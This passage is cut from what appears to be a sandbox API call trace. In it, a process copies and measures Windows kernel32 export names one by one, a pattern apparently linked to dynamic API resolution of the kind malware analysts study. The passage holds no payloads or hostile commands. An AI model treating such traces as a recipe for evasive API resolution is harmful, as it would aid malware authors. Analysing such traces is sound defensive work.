lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0090.252] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0090.252] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0090.252] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0090.252] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0090.252] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0090.252] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0090.252] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0090.252] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0090.252] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0090.252] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0090.252] lstrlenA (lpString="COPYCONTEXT") returned 11 [0090.253] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0090.253] lstrlenA (lpString="COPYFILEA") returned 9 [0090.253] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0090.253] lstrlenA (lpString="COPYFILEEXA") returned 11 [0090.253] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0090.253] lstrlenA (lpString="COPYFILEEXW") returned 11 [0090.253] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0090.253] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0090.253] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0090.253] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0090.253] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0090.253] lstrlenA (lpString="COPYFILEW") returned 9 [0090.253] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0090.253] lstrlenA (lpString="COPYLZFILE") returned 10 [0090.253] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0090.253] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0090.253] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0090.253] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0090.253] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0090.253] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0090.253] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0090.253] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0090.253] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0090.253] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0090.253] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0090.253] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0090.253] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0090.253] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0090.253] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0090.253] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0090.253] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0090.253] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0090.253] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0090.253] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0090.253] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0090.253] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0090.254] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0090.254] lstrlenA (lpString="CREATEEVENTA") returned 12 [0090.254] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0090.254] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0090.255] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0090.255] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0090.255] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0090.255] lstrlenA (lpString="CREATEEVENTW") returned 12 [0090.255] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0090.255] lstrlenA (lpString="CREATEFIBER") returned 11 [0090.255] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0090.255] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0090.255] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0090.255] lstrlenA (lpString="CREATEFILEA") returned 11 [0090.255] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0090.255] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0090.255] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0090.255] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0090.255] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0090.255] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0090.255] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0090.255] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0090.255] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0090.255] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0090.255] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0090.255] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0090.255] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0090.255] lstrlenA (lpString="CREATEFILEW") returned 11 [0090.255] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0090.255] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0090.255] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0090.255] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0090.255] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0090.255] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0090.255] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0090.256] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0090.256] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0090.256] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0090.256] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0090.256] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0090.256] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0090.256] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0090.256] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0090.256] lstrlenA (lpString="CREATEJOBSET") returned 12 [0090.256] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0090.256] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0090.256] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0090.256] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0090.256] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0090.256] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0090.256] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0090.256] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0090.256] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0090.256] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0090.256] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0090.256] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0090.256] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0090.256] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0090.256] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0090.256] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0090.256] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0090.256] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0090.256] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0090.256] lstrlenA (lpString="CREATEPIPE") returned 10 [0090.256] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0090.256] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0090.256] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0090.256] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0090.256] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0090.256] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0090.256] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0090.257] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0090.257] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0090.257] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0090.257] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0090.257] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0090.257] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0090.257] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0090.257] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0090.257] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0090.257] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0090.257] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0090.257] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0090.257] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0090.257] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0090.257] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0090.257] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0090.257] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0090.257] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0090.257] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0090.257] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0090.257] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0090.257] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0090.257] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0090.257] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0090.257] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0090.257] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0090.257] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0090.257] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0090.257] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0090.257] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0090.257] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0090.257] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0090.257] lstrlenA (lpString="CREATETHREAD") returned 12 [0090.257] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0090.257] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0090.257] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0090.258] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0090.258] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0090.258] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0090.258] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0090.258] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0090.258] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0090.258] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0090.258] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0090.258] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0090.258] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0090.258] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0090.258] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0090.258] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0090.258] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0090.258] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0090.258] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0090.258] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0090.258] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0090.258] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0090.258] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0090.258] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0090.258] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0090.258] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0090.258] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0090.258] lstrlenA (lpString="CTRLROUTINE") returned 11 [0090.258] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0090.258] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0090.258] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0090.258] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0090.258] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0090.258] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0090.258] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0090.258] lstrlenA (lpString="DEBUGBREAK") returned 10 [0090.258] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0090.258] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0090.258] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0090.259] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0090.259] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0090.259] lstrlenA (lpString="DECODEPOINTER") returned 13 [0090.259] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0090.259] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0090.259] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0090.259] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0090.259] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0090.259] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0090.259] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0090.259] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0090.259] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0090.259] lstrlenA (lpString="DELETEATOM") returned 10 [0090.259] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0090.259] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0090.259] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0090.259] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0090.259] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0090.259] lstrlenA (lpString="DELETEFIBER") returned 11 [0090.259] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0090.259] lstrlenA (lpString="DELETEFILEA") returned 11 [0090.259] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0090.259] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0090.259] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0090.259] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0090.259] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0090.259] lstrlenA (lpString="DELETEFILEW") returned 11 [0090.259] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0090.259] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0090.259] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0090.259] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0090.259] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0090.259] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0090.259] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0090.259] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0090.260] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0090.260] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0090.260] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0090.260] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0090.260] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0090.260] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0090.260] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0090.260] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0090.260] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0090.260] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0090.260] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0090.260] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0090.260] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0090.260] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0090.260] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0090.260] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0090.260] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0090.260] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0090.260] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0090.260] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0090.260] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0090.260] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0090.260] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0090.260] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0090.260] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0090.260] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0090.261] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0090.261] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0090.261] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0090.261] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0090.261] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0090.261] lstrlenA 